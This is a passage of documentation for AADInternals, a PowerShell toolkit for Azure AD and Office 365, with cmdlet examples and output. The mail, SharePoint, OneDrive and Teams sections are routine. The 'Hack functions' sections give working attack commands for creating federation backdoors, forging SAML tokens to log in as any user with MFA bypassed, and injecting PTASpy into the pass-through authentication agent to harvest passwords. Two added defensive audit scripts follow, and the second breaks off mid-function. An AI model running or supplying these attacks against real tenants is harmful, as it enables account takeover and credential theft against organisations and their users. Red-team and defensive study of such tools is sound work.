# Create a device
Set-AADIntEASSettings -Credentials $Cred -DeviceId android01234 -DeviceType Android -Model "Android 01234" -PhoneNumber "+1234567890"

Output:

<Settings xmlns="Settings"><Status>1</Status><DeviceInformation><Status>1</Status></DeviceInformation></Settings>

Get-AADIntMobileDevices (E)

Since version 0.1.6
Gets mobile devices from Exchange Online. Devices can be used to send emails with Send-AADIntEASMessage

Example:

# Get credentials
$Cred=Get-Credential
# Get Mobile Devices
Get-AADIntMobileDevices -Credentials $Cred | select DeviceId,DeviceType,ClientType,UserDisplayname

Output:

DeviceId     DeviceType                 ClientType UserDisplayName                                                 
--------     ----------                 ---------- ---------------                                                 
430847304    TestActiveSyncConnectivity EAS        EURP189A002.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizat
android01234 Android                    EAS        EURP189A002.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizat

Send-AADIntEASMessage (E)

Since version 0.1.6
Sends an email from the given user via ActiveSync using the given device.

Example:

# Get credentials
$Cred=Get-Credential
# Send an email
Send-AADIntEASMessage -Credentials $Cred -DeviceId android01234 -DeviceType Android -Recipient "someone@company.com" -Subject "An email" -Message "<h2>This is a message!</h2>"

Output:

WARNING: Message was not Base64 encoded, converting..

Send-AADIntOutlookMessage (E)

Since version 0.1.6
Sends an email from the given user via Outlook API.

Example:

# Get access token
$At=Get-AADIntAccessTokenForEXO
# Send the email
Send-AADIntOutlookMessage -AccessToken $At -Recipient "someone@company.com" -Subject "An email" -Message "<h2>This is a message!</h2>"

SharePoint Online functions

SharePoint Online functions are used to retrieve information about users and groups of SharePoint sites.

Get-AADIntSPOSiteUsers (S)

Since version 0.2.4
Returns users of the given site. Only visitor (read) access is needed :)

Example:

# Get site users
$ah=Get-AADIntSPOAuthenticationHeader -Site https://company.sharepoint.com
Get-AADIntSPOSiteUsers -Site https://company.sharepoint.com -AuthHeader $ah

Output:

IsSiteAdmin                    : True
Id                             : 17
LoginName                      : c:0t.c|tenant|a200e3ee-47d0-4b9b-99c6-554b85823042
PrincipalType                  : 4
IsEmailAuthenticationGuestUser : False
UserPrincipalName              : 
IsShareByEmailGuestUser        : False
IsHiddenInUI                   : False
NameId                         : 
NameIdIssuer                   : 
Title                          : SharePoint Service Administrator
Email                          : 

IsSiteAdmin                    : False
Id                             : 1073741823
LoginName                      : SHAREPOINT\system
PrincipalType                  : 1
IsEmailAuthenticationGuestUser : False
UserPrincipalName              : 
IsShareByEmailGuestUser        : False
IsHiddenInUI                   : False
NameId                         : S-1-0-0
NameIdIssuer                   : urn:office:idp:activedirectory
Title                          : System Account
Email                          : 

IsSiteAdmin                    : False
Id                             : 23
LoginName                      : i:0#.f|membership|user@company.com
PrincipalType                  : 1
IsEmailAuthenticationGuestUser : False
UserPrincipalName              : user@company.com
IsShareByEmailGuestUser        : False
IsHiddenInUI                   : False
NameId                         : 10030000b5466d52
NameIdIssuer                   : urn:federation:microsoftonline
Title                          : user
Email                          : user@company.com

Get-AADIntSPOUserProperties (S)

Since version 0.2.4
Returns detailed information about the given user. Only visitor (read) access is needed :)

Note: the user’s name must be in SharePoint “LoginName” format as above.

Example:

# Get site users
$ah=Get-AADIntSPOAuthenticationHeader -Site https://company.sharepoint.com
Get-AADIntSPOUserProperties -Site https://company.sharepoint.com -AuthHeader $ah -User "i:0#.f|membership|user@company.com"

Output:

Updated                            : 2019-08-16T07:59:30Z
Author                             : 
AccountName                        : i:0#.f|membership|user@company.com
DirectReports                      : 
DisplayName                        : user
Email                              : user@company.com
ExtendedManagers                   : 
ExtendedReports                    : i:0#.f|membership|user@company.com
IsFollowed                         : False
Peers                              : 
PersonalUrl                        : https://company-my.sharepoint.com/personal/user_company_com/
PictureURL                         : 
UserUrl                            : https://company-my.sharepoint.com:443/Person.aspx?accountname=i:0#.f|membership|user@company.com
Title                              : 
UserProfile_GUID                   : f6b3014d-c4d7-4775-a37c-1e6f14fa98f9
SID                                : i:0h.f|membership|10030000a5566b50@live.com
ADGuid                             : System.Byte[]
FirstName                          : 
SPS-PhoneticFirstName              : 
LastName                           : 
SPS-PhoneticLastName               : 
PreferredName                      : user
SPS-PhoneticDisplayName            : 
WorkPhone                          : 
Department                         : 
SPS-Department                     : 
Manager                            : 
AboutMe                            : 
PersonalSpace                      : /personal/user_company_com/
UserName                           : user@company.com
QuickLinks                         : 
WebSite                            : 
PublicSiteRedirect                 : 
SPS-JobTitle                       : 
SPS-Dotted-line                    : 
SPS-Peers                          : 
SPS-Responsibility                 : 
SPS-SipAddress                     : user@company.com
SPS-MySiteUpgrade                  : 
SPS-ProxyAddresses                 : 
SPS-HireDate                       : 
SPS-DisplayOrder                   : 
SPS-ClaimID                        : user@company.com
SPS-ClaimProviderID                : membership
SPS-ResourceSID                    : 
SPS-ResourceAccountName            : 
SPS-MasterAccountName              : 
SPS-UserPrincipalName              : user@company.com
SPS-O15FirstRunExperience          : 
SPS-PersonalSiteInstantiationState : 2
SPS-DistinguishedName              : CN=abf7eff8-59a5-456f-a723-976f07b14420,OU=a200e3ee-47d0-4b9b-99c6-554b85823042,OU=Tenants,OU=MSOnline,DC=SPODS44818354,DC=msoprd,DC=msft,DC=net
SPS-SourceObjectDN                 : 
SPS-ClaimProviderType              : Forms
SPS-SavedAccountName               : SPODS44833354\$JUHIC0-TJJO02Q7PVM2
SPS-SavedSID                       : System.Byte[]
SPS-ObjectExists                   : 
SPS-PersonalSiteCapabilities       : 4
SPS-PersonalSiteFirstCreationTime  : 10/2/2017 5:50:10 PM
SPS-PersonalSiteLastCreationTime   : 10/2/2017 5:50:10 PM
SPS-PersonalSiteNumberOfRetries    : 1
SPS-PersonalSiteFirstCreationError : 
SPS-FeedIdentifier                 : 
WorkEmail                          : user@company.com
CellPhone                          : 
Fax                                : 
HomePhone                          : 
Office                             : 
SPS-Location                       : 
Assistant                          : 
SPS-PastProjects                   : 
SPS-Skills                         : 
SPS-School                         : 
SPS-Birthday                       : 
SPS-StatusNotes                    : 
SPS-Interests                      : 
SPS-HashTags                       : 
SPS-EmailOptin                     : 
SPS-PrivacyPeople                  : True
SPS-PrivacyActivity                : 4095
SPS-PictureTimestamp               : 
SPS-PicturePlaceholderState        : 
SPS-PictureExchangeSyncState       : 
SPS-TimeZone                       : 
OfficeGraphEnabled                 : 
SPS-UserType                       : 0
SPS-HideFromAddressLists           : False
SPS-RecipientTypeDetails           : 
DelveFlags                         : 
msOnline-ObjectId                  : abf7eff8-59a5-456f-a723-976f07b14420
SPS-PointPublishingUrl             : 
SPS-TenantInstanceId               : 
SPS-SharePointHomeExperienceState  : 
SPS-MultiGeoFlags                  : 
PreferredDataLocation              : 

Get-AADIntSPOSiteGroups (S)

Since version 0.2.4
Returns the groups of the given site. Only visitor (read-access) is needed :)

Example:

# Get site groups
$ah=Get-AADIntSPOAuthenticationHeader -Site https://company.sharepoint.com
Get-AADIntSPOSiteGroups -Site https://company.sharepoint.com -AuthHeader $ah

Output:

AllowRequestToJoinLeave        : False
Id                             : 3
LoginName                      : Excel Services Viewers
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : True
IsHiddenInUI                   : False
Description                    : 
Title                          : Excel Services Viewers
OwnerTitle                     : System Account

AllowRequestToJoinLeave        : False
Id                             : 19
LoginName                      : SharePointHome OrgLinks Admins
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : True
IsHiddenInUI                   : False
Description                    : 
Title                          : SharePointHome OrgLinks Admins
OwnerTitle                     : SharePointHome OrgLinks Admins

AllowRequestToJoinLeave        : False
Id                             : 20
LoginName                      : SharePointHome OrgLinks Editors
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : True
IsHiddenInUI                   : False
Description                    : 
Title                          : SharePointHome OrgLinks Editors
OwnerTitle                     : SharePointHome OrgLinks Editors

AllowRequestToJoinLeave        : False
Id                             : 21
LoginName                      : SharePointHome OrgLinks Viewers
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : True
IsHiddenInUI                   : False
Description                    : 
Title                          : SharePointHome OrgLinks Viewers
OwnerTitle                     : SharePointHome OrgLinks Admins

AllowRequestToJoinLeave        : False
Id                             : 9
LoginName                      : Team Site Members
AllowMembersEditMembership     : True
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : False
IsHiddenInUI                   : False
Description                    : 
Title                          : Team Site Members
OwnerTitle                     : Team Site Owners

AllowRequestToJoinLeave        : False
Id                             : 7
LoginName                      : Team Site Owners
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : False
IsHiddenInUI                   : False
Description                    : 
Title                          : Team Site Owners
OwnerTitle                     : Team Site Owners

AllowRequestToJoinLeave        : False
Id                             : 8
LoginName                      : Team Site Visitors
AllowMembersEditMembership     : False
AutoAcceptRequestToJoinLeave   : False
PrincipalType                  : 8
OnlyAllowMembersViewMembership : False
IsHiddenInUI                   : False
Description                    : 
Title                          : Team Site Visitors
OwnerTitle                     : Team Site Owners

OneDrive for Business functions

OneDrive functions are used to download, send, and modify files using OneDrive for Business APIs.

New-AADIntOneDriveSettings

Since version 0.2.7
Creates a new OneDriveSettings object used with other OneDrive for Business functions.

To create new settings using interactive authentication (prompts twice, once for the OfficeApps API and once for the OneDrive API):

Example:

# Create a new OneDriveSettings object
$os = New-AADIntOneDriveSettings

To create new settings using Kerberos tickets:

Example:

# Create a Kerberos ticket
$kt=New-AADIntKerberosTicket -ADUserPrincipalName user@company.com -Password "mypassword"

# Create a new OneDriveSettings object using Kerberos ticket
$os = New-AADIntOneDriveSettings -KerberosTicket $kt

Get-AADIntOneDriveFiles (O)

Since version 0.2.7
Downloads all of the user’s OneDrive for Business files.

Besides downloading the files, the following information is returned per file.

Attribute  Description
---------  -----------
Path       The relative path of the file or folder
Size       Size in bytes
ETag       Resource id and the next version number of the file in format “{},
Created    The time when the file was created
Modified   The time when the file was modified
ResourceID The unique id of the file or folder
MimeType   The mime type of the file
Url        The “pre-authenticated” url of the file
XORHash    Xor-hash value of the file

Note! If you only want to list the files and folders, use the -PrintOnly switch. If sync is restricted to only the members of specific domain(s), use the -DomainGuid parameter.

To download the user’s OneDrive files, use the following commands:

Example:

# Create a new OneDriveSettings object
$os = New-AADIntOneDriveSettings

# Download the contents of the OneDrive to the current folder    
Get-AADIntOneDriveFiles -OneDriveSettings $os | Format-Table

Output:

Path                              Size  Created            Modified           ResourceID                   
----                              ----  -------            --------           ----------                   
\RootFolder\Document1.docx        11032 2.12.2019 20.47.23 2.12.2019 20.48.46 5e7acf393a2e45f18c1ce6caa7...
\RootFolder\Book.xlsx             8388  2.12.2019 20.49.14 2.12.2019 20.50.14 b26c0a38d4d14b23b785576e29...
\RootFolder\Docs\Document1.docx   84567 9.12.2019 11.24.40 9.12.2019 12.17.50 d9d51e47b66c4805aff3a08763...
\RootFolder\Docs\Document2.docx   31145 7.12.2019 17.28.37 7.12.2019 17.28.37 972f9c317e1e468fb2b6080ac2...

Send-AADIntOneDriveFile (O)

Since version 0.2.7
Uploads a local file to a specific folder in the user’s OneDrive.

Note! To send a file, you need the ResourceID of the folder you are sending the file to.

Note! If sync is restricted to only the members of specific domain(s), use the -DomainGuid parameter.

To send a file to the Documents folder of the user’s OneDrive:

Example:

# Create a new OneDriveSettings object
$os = New-AADIntOneDriveSettings

# List folders and their resource ids:
Get-AADIntOneDriveFiles -OneDriveSettings $os -PrintOnly -FoldersOnly | select Path,ResourceID

Path                  ResourceID                      
----                  ----------                      
\RootFolder           1679e14635404542880e3885b4374c3f
\RootFolder\Documents a2a54a01b586480ebbddf04cfaa36191
\RootFolder\Sales     bd59baa485a2411e951234fe6cbd8c5d

# Send the file to the Documents folder
Send-AADIntOneDriveFile -OneDriveSettings $os -FileName .\Document.docx -FolderId "a2a54a01b586480ebbddf04cfaa36191"

Output:

ResourceID                            : 32b66e08379d4c448e001e9659777c71
ETag                                  : "{32B66E08-379D-4C44-8E00-1E9659777C71},2"
DateModified                          : 2019-12-11T11:18:38.0000000Z
RelationshipName                      : Document.docx
ParentResourceID                      : a2a54a01b586480ebbddf04cfaa36191
fsshttpstate.xschema.storage.live.com : fsshttpstate.xschema.storage.live.com
DocumentStreams                       : DocumentStreams
WriteStatus                           : Success

If the file already exists (or a similar problem occurs), you’ll get an error like the following:

RelationshipName ParentResourceID                 WriteStatus      
---------------- ----------------                 -----------      
Document         a2a54a01b586480ebbddf04cfaa36191 ItemAlreadyExists

To update an existing file, you also need to know the ETag.

Example:

# Update the file to Documents folder
Send-AADIntOneDriveFile -OneDriveSettings $os -FileName .\Document.docx -FolderId "a2a54a01b586480ebbddf04cfaa36191" -ETag "{32B66E08-379D-4C44-8E00-1E9659777C71},2"

Output:

ResourceID                            : 32b66e08379d4c448e001e9659777c71
ETag                                  : "{32B66E08-379D-4C44-8E00-1E9659777C71},3"
DateModified                          : 2019-14-11T12:08:55.0000000Z
RelationshipName                      : Document.docx
ParentResourceID                      : a2a54a01b586480ebbddf04cfaa36191
fsshttpstate.xschema.storage.live.com : fsshttpstate.xschema.storage.live.com
DocumentStreams                       : DocumentStreams
WriteStatus                           : Success

Teams functions

Teams functions are used to send and delete Teams messages.

Get-AADIntSkypeToken (T)

Since version 0.4.4
Gets SkypeToken used for authentication for certain Teams services.

Example:

# Get access token for teams and save to cache
Get-AADIntAccessTokenForTeams -SaveToCache

# Get Skype token and save to variable
$skypeToken = Get-AADIntSkypeToken

Set-AADIntTeamsAvailability (T)

Since version 0.4.4
Sets the availability status of the user to Available, Busy, DoNotDisturb, BeRightBack, or Away.

Example:

# Get access token for teams and save to cache
Get-AADIntAccessTokenForTeams -SaveToCache

# Set Teams availability status to Busy
Set-AADIntTeamsAvailability -Status Busy

Set-AADIntTeamsStatusMessage (T)

Since version 0.4.4
Sets the Teams status message of the user.

Example:

# Get access token for teams and save to cache
Get-AADIntAccessTokenForTeams -SaveToCache

# Set Teams status message
Set-AADIntTeamsStatusMessage -Message "Out of office til noon"

Search-AADIntTeamsUser (TO)

Since version 0.4.4
Searches for users with the given search string.

Example:

# Get access token for teams (to outlook) and save to cache
Get-AADIntAccessTokenForTeams -Resource https://outlook.com -SaveToCache

# Search for users
Search-AADIntTeamsUser -SearchString "user" | Format-Table UserPrincipalName,DisplayName

Output:

UserPrincipalName       DisplayName
-----------------       -----------
first.user@company.com  First User 
second.user@company.com Second User

Send-AADIntTeamsMessage (T)

Since version 0.4.4
Sends a Teams message to given recipients.

Example:

# Get access token for teams and save to cache
Get-AADIntAccessTokenForTeams -SaveToCache

# Send Teams message
Send-AADIntTeamsMessage -Recipients user@company.com -Message "Hi user!"

Output:

Sent                MessageID         
----                ---------         
16/10/2020 14.40.23 132473328207053858

Get-AADIntTeamsMessages (T)

Since version 0.4.4
Gets user’s latest Teams messages.

Example:

# Get access token for teams and save to cache
Get-AADIntAccessTokenForTeams -SaveToCache

# Get Teams messages
Get-AADIntTeamsMessages | Format-Table id,content,deletiontime,*type*,DisplayName

Output:

Id            Content                         DeletionTime  MessageType   Type          DisplayName 
--            -------                         ------------  -----------   ----          ----------- 
1602842299338                                 1602846853687 RichText/Html MessageUpdate Bad User
1602844861358                                 1602858789696 RichText/Html MessageUpdate Bad User
1602846167606                                 1602858792943 Text          MessageUpdate Bad User
1602846853687                                 1602858795517 Text          MessageUpdate Bad User
1602833251951                                 1602833251951 Text          MessageUpdate Bad User
1602833198442                                 1602833198442 Text          MessageUpdate Bad User
1602859223294 Hola User!                                    Text          NewMessage    Bad User
1602859423019 Hi User!                                      Text          NewMessage    Bad User
1602859423019 Hi User!                                      Text          MessageUpdate Bad User
1602859473083 <div><div>Hi User!</div></div>                RichText/Html NewMessage    Bad User
1602859484420 Hey User!                                     Text          NewMessage    Bad User
1602859528028 Hy User!                                      Text          NewMessage    Bad User
1602859484420 Hey User!                                     Text          MessageUpdate Bad User
1602859590916 Hi User!                                      Text          NewMessage    Bad User

Remove-AADIntTeamsMessages (T)

Since version 0.4.4
Deletes given Teams messages.

Example:

# Get access token for teams and save to cache
Get-AADIntAccessTokenForTeams -SaveToCache

# Get Teams messages
Get-AADIntTeamsMessages | Format-Table id,content,deletiontime,*type*,DisplayName

Id            Content                         DeletionTime  MessageType   Type          DisplayName 
--            -------                         ------------  -----------   ----          ----------- 
1602842299338                                 1602846853687 RichText/Html MessageUpdate Bad User
1602844861358                                 1602858789696 RichText/Html MessageUpdate Bad User
1602846167606                                 1602858792943 Text          MessageUpdate Bad User
1602846853687                                 1602858795517 Text          MessageUpdate Bad User
1602833251951                                 1602833251951 Text          MessageUpdate Bad User
1602833198442                                 1602833198442 Text          MessageUpdate Bad User
1602859223294 Hola User!                                    Text          NewMessage    Bad User
1602859423019 Hi User!                                      Text          NewMessage    Bad User
1602859423019 Hi User!                                      Text          MessageUpdate Bad User
1602859473083 <div><div>Hi User!</div></div>                RichText/Html NewMessage    Bad User
1602859484420 Hey User!                                     Text          NewMessage    Bad User
1602859528028 Hy User!                                      Text          NewMessage    Bad User
1602859484420 Hey User!                                     Text          MessageUpdate Bad User
1602859590916 Hi User!                                      Text          NewMessage    Bad User

# Delete Teams messages
Remove-AADIntTeamsMessages -MessageIDs 1602859590916,1602859484420

Hack functions: Identity Federation

Set-AADIntDomainAuthentication (A)

Sets the authentication method of the domain. Same functionality as the Set-MsolDomainAuthentication cmdlet.

Example:

# Set authentication method to managed
Set-AADIntDomainAuthentication -DomainName company.com -Authentication Managed

ConvertTo-AADIntBackdoor (A)

This function converts the given domain to a “backdoor”, which can be used to log in to the tenant as any user. See Open-AADIntOffice365Portal to use the backdoor.

This exploits a vulnerability I discovered in late 2017. Technically, the domain authentication type is set to Federated and configured to trust a specific certificate (any.sts) and issuer. You can get a free domain from www.myo365.site.

Edit May 9th 2019: In late 2018 I discovered that unverified domains can also be used as a backdoor. Microsoft has not responded to emails regarding this “feature”.

Example:

# Convert the domain to backdoor
ConvertTo-AADIntBackdoor -DomainName company.myo365.site

Output:

IssuerUri               Domain              
---------               ------              
http://any.sts/B231A11F company.myo365.site

New-AADIntBackdoor (A)

Since version 0.1.6
This function creates a “backdoor” for the given domain name, which can be used to log in to the tenant as any user. See Open-AADIntOffice365Portal to use the backdoor.

This exploits a vulnerability I discovered in late 2018 which allows setting the authentication method for unverified domains as well. Microsoft has not responded to emails regarding this “feature”. NOTE! Microsoft fixed this during spring 2020.

Example:

# Create a new backdoor
New-AADIntBackdoor -DomainName microsoft.com

Output:

Are you sure to create backdoor with microsoft.com? Type YES to continue or CTRL+C to abort: yes

Authentication     : Managed
Capabilities       : None
IsDefault          : false
IsInitial          : false
Name               : microsoft.com
RootDomain         : 
Status             : Unverified
VerificationMethod : 

IssuerUri               Domain              
---------               ------              
http://any.sts/B231A11F company.myo365.site

Open-AADIntOffice365Portal (*)

This function creates a fake (but valid) WS-Fed/SAML authentication token in an .html file and opens it in Internet Explorer in private mode. Use the ImmutableId of any user in your tenant and the issuer “http://any.sts/B231A11F” you created with ConvertTo-AADIntBackdoor.

Internet Explorer should log in automatically unless security settings don’t allow that. If that happens, just click Allow blocked content or the Login to Office 365 button and you’re done! From there, you can also browse to https://portal.azure.com as the same user you just logged in as.

Example:

# Login as anyone
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA $true

Output: (security alert dialog, shown as a screenshot in the original)
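The federation settings that ConvertTo-AADIntBackdoor and New-AADIntBackdoor change are readable by tenant administrators, so the same settings can be audited from the defender’s side. The following is an added example, not part of AADInternals, that uses the MSOnline module’s Get-MsolDomain and Get-MsolDomainFederationSettings cmdlets to report every federated domain whose IssuerUri or token-signing certificate is not on an allowlist, and every domain that is federated while still unverified. It assumes Connect-MsolService has already been run with an account that can read domain settings; the expected issuer URI and thumbprint values are placeholders for the organisation’s own AD FS configuration.

```powershell
# Added example (not part of AADInternals): audit domain federation trusts.
# Assumes Connect-MsolService has already been run. The allowlists are
# placeholders that must be taken from the AD FS farm's own configuration.

function Get-FederationThumbprints {
    # Convert the Base64-encoded signing certificates returned by
    # Get-MsolDomainFederationSettings into SHA-1 thumbprints.
    param([string[]]$Base64Certs)
    foreach ($b64 in $Base64Certs) {
        if ([string]::IsNullOrWhiteSpace($b64)) { continue }
        $cert = [System.Security.Cryptography.X509Certificates.X509Certificate2]::new(
            [Convert]::FromBase64String($b64))
        $cert.Thumbprint
    }
}

function Test-DomainFederationTrust {
    param(
        # Issuer URIs of the organisation's own AD FS farm(s) (placeholder).
        [Parameter(Mandatory)][string[]]$ExpectedIssuerUris,
        # Thumbprints of the AD FS token-signing certificate(s) (placeholder).
        [Parameter(Mandatory)][string[]]$ExpectedThumbprints
    )

    foreach ($domain in Get-MsolDomain) {
        $findings = @()

        if ($domain.Authentication -eq 'Federated') {
            $fed = Get-MsolDomainFederationSettings -DomainName $domain.Name

            # A federation trust pointing at an issuer the organisation does not run.
            if ($ExpectedIssuerUris -notcontains $fed.IssuerUri) {
                $findings += "unexpected IssuerUri '$($fed.IssuerUri)'"
            }

            # A signing certificate the organisation does not control (current or next).
            $thumbprints = Get-FederationThumbprints -Base64Certs $fed.SigningCertificate, $fed.NextSigningCertificate
            foreach ($tp in $thumbprints) {
                if ($ExpectedThumbprints -notcontains $tp) {
                    $findings += "unexpected signing certificate $tp"
                }
            }

            # Federation on a domain the tenant has never proven it owns.
            if ($domain.Status -ne 'Verified') {
                $findings += "federated but domain status is '$($domain.Status)'"
            }
        }

        [pscustomobject]@{
            Domain         = $domain.Name
            Status         = $domain.Status
            Authentication = $domain.Authentication
            Suspicious     = ($findings.Count -gt 0)
            Findings       = ($findings -join '; ')
        }
    }
}

# Usage: replace the placeholders with your AD FS issuer URI and certificate thumbprint(s).
Test-DomainFederationTrust `
    -ExpectedIssuerUris  @('http://adfs.company.com/adfs/services/trust') `
    -ExpectedThumbprints @('<token-signing-certificate-thumbprint>') |
    Where-Object Suspicious | Format-List
```

The allowlists deliberately come from the AD FS side rather than from the tenant, so that a trust someone added through the tenant is not silently accepted as the baseline. Run against the page’s own example, an IssuerUri of http://any.sts/B231A11F, or a federated domain with Status Unverified, would both be reported.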

Hack functions: Pass-through authentication (PTA)

Set-AADIntPassThroughAuthentication (P)

This function enables or disables pass-through authentication (PTA).

Example:

# Prompt for credentials and store the token
$pt=Get-AADIntAccessTokenForPTA -Credentials (Get-Credential)
# Disable PTA
Set-AADIntPassThroughAuthentication -AccessToken $pt -Enable $false

Output:

IsSuccesful Enable Exists
----------- ------ ------
true        false  true 

Install-AADIntPTASpy (*)

Since version 0.2.0
Installs PTASpy into the pass-through authentication agent on the current computer. Must be run as Local Admin on a computer that has the Azure AD Authentication Agent installed and running (AzureADConnectAuthenticationAgentService.exe).

A hidden folder is created (C:\PTASpy) and PTASpy.dll is copied there. PTASpy.dll is then injected into the running AzureADConnectAuthenticationAgentService. When installed, PTASpy collects all used credentials and stores them in C:\PTASpy\PTASpy.csv with Base64 encoded passwords. PTASpy accepts all passwords so it can be used as a backdoor.

Use Get-AADIntPTASpyLog to read the log.

Example:

# Install PTASpy
Install-AADIntPTASpy

Output:

Are you sure you wan't to install PTASpy to this computer? Type YES to continue or CTRL+C to abort: yes
Installation successfully completed!
All passwords are now accepted and credentials collected to C:\PTASpy\PTASpy.csv

Get-AADIntPTASpyLog (*)

Since version 0.2.0
Lists the credentials from C:\PTASpy\PTASpy.csv collected by PTASpy.

Example 1:

# Show the PTASpy log
Get-AADIntPTASpyLog

Output:

UserName         Password                     Time                
--------         --------                     ----                
user@company.com TQB5AFAAYQBzAHMAdwBvAHIAZAA= 5/22/2019 9:51:43 AM
user@company.com bQBZAHAAQQBTAFMAVwBPAFIARAA= 5/22/2019 9:52:07 AM

Example 2:

# Show the PTASpy log with decoded passwords
Get-AADIntPTASpyLog -DecodePasswords

Output:

UserName         Password   Time                
--------         --------   ----                
user@company.com MyPassword 5/22/2019 9:51:43 AM
user@company.com mYpASSWORD 5/22/2019 9:52:07 AM

Remove-AADIntPTASpy (*)

Since version 0.2.0
Restarts the Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent) service and removes PTASpy.

Example:

# Remove PTASpy
Remove-AADIntPTASpy

Output:

WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
Service restarted and C:\PTASpy\PTASpy.dll removed.

Register-AADIntPTAAgent (P)

Since version 0.2.8
Registers a PTA agent to Azure AD with the given machine name and creates a client certificate. After the registration, the certificate and name can be used with the Microsoft Azure AD Connect / PTA agent (Set-AADIntPTACertificate) or with Invoke-AADIntPTAAgent.

Example 1:

# Register a PTA Agent
Register-AADIntPTAAgent -MachineName "server1.company.com"

Output:

PTA Agent (005b136f-db3e-4b54-9d8b-8994f7717de6) registered as server1.company.com
Certificate saved to PTA_client_certificate.pfx

Example 2:

# Register a PTA Agent
$pt=Get-AADIntAccessTokenForPTA
Register-AADIntPTAAgent -AccessToken $pt -MachineName "server1.company.com" -FileName server1.pfx

Output:

PTA Agent (005b136f-db3e-4b54-9d8b-8994f7717de6) registered as server1.company.com
Certificate saved to server1.pfx

Register-AADIntSyncAgent (P)

Since version 0.2.9
Registers a sync agent to Azure AD with the given machine name and creates a client certificate. After the registration, the certificate and name can be used with the Azure AD Connect cloud provisioning agent.

Example 1:

# Register a Sync Agent
Register-AADIntSyncAgent -MachineName "server1.company.com"

Output:

Sync agent registered as server1.company.com
Certificate saved to PTA_client_certificate.pfx

Example 2:

# Register a Sync Agent
$pt=Get-AADIntAccessTokenForPTA
Register-AADIntSyncAgent -AccessToken $pt -MachineName "server1.company.com" -FileName server1.pfx

Output:

Sync agent registered as server1.company.com
Certificate saved to server1.pfx

Set-AADIntPTACertificate (*)

Since version 0.2.8
Sets the certificate used by the Azure AD Authentication Agent. Can be used to change the name and target tenant of the PTA Agent. It changes the InstanceID and TenantID registry values at “HKLM:\SOFTWARE\Microsoft\Azure AD Connect Agents\Azure AD Connect Authentication Agent”, and the certificate thumbprint at “$env:ProgramData\Microsoft\Azure AD Connect Authentication Agent\Config\TrustSettings.xml”. It also imports the certificate to “Cert:\LocalMachine\My” and gives “Network Service” read access to its private key. Together with PTASpy, this allows using a standalone server as a backdoor.

Note! After restarting the service, the PTA Agent might be unable to decrypt password requests. To get decryption to work, you MUST manually give “Network Service” read access to the private key file under “C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\”. Use the SysInternals Process Monitor to see which file gets an ACCESS DENIED error.

Example 1:

# Change the PTA certificate
Set-AADIntPTACertificate -PfxFileName server1.pfx -PfxPassword "password"

Output:

Certification information set, remember to restart the service.

Example 2:

# Register a PTA agent
$pt=Get-AADIntAccessTokenForPTA
Register-AADIntPTAAgent -MachineName "server1.company.com" -AccessToken $pt

Output:

PTA agent registered as server1.company.com
Certificate saved to PTA_client_certificate.pfx
# Change the PTA certificate
Set-AADIntPTACertificate

Output:

Certification information set, remember to restart the service.
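Install-AADIntPTASpy and Set-AADIntPTACertificate both leave host-level traces described above: the C:\PTASpy folder and its DLL and CSV, a module injected into AzureADConnectAuthenticationAgentService.exe, the InstanceID and TenantID registry values, and the certificate thumbprint in TrustSettings.xml. The following is an added example, not part of AADInternals, of a PowerShell integrity check for a PTA agent server that inspects exactly those locations. It assumes it is run in an elevated session on the agent host (needed to enumerate the service process’s modules), that legitimate agent modules are loaded from Program Files or the Windows directory, and that TrustSettings.xml contains the thumbprint as 40 hexadecimal characters; the page does not show the file’s structure, so that last point is an assumption, and the expected tenant ID is a placeholder.

```powershell
# Added example (not part of AADInternals): host integrity checks for a PTA agent server.
# Run in an elevated PowerShell session on the agent host.
# Assumptions not taken from the page: legitimate modules of the agent process live under
# Program Files or Windows; TrustSettings.xml stores the thumbprint as 40 hex characters.

function Test-PtaAgentHost {
    param(
        # Placeholder: the tenant this agent is supposed to serve.
        [Parameter(Mandatory)][string]$ExpectedTenantId
    )

    $findings = [System.Collections.Generic.List[string]]::new()

    # 1. PTASpy artefacts on disk (paths as documented for Install-AADIntPTASpy).
    foreach ($path in 'C:\PTASpy', 'C:\PTASpy\PTASpy.dll', 'C:\PTASpy\PTASpy.csv') {
        if (Test-Path -LiteralPath $path) { $findings.Add("artefact present: $path") }
    }

    # 2. Modules loaded into the agent service process (PTASpy is injected as a DLL).
    $agent = Get-Process -Name 'AzureADConnectAuthenticationAgentService' -ErrorAction SilentlyContinue
    if (-not $agent) {
        $findings.Add('AzureADConnectAuthenticationAgentService.exe is not running')
    } else {
        try { $modules = @($agent.Modules) }
        catch { $findings.Add("could not enumerate modules (run elevated): $($_.Exception.Message)"); $modules = @() }
        foreach ($module in $modules) {
            if ($module.FileName -notmatch '^[A-Za-z]:\\(Program Files|Program Files \(x86\)|Windows)\\') {
                $findings.Add("unexpected module in agent process: $($module.FileName)")
            }
        }
    }

    # 3. Registry values rewritten by Set-AADIntPTACertificate.
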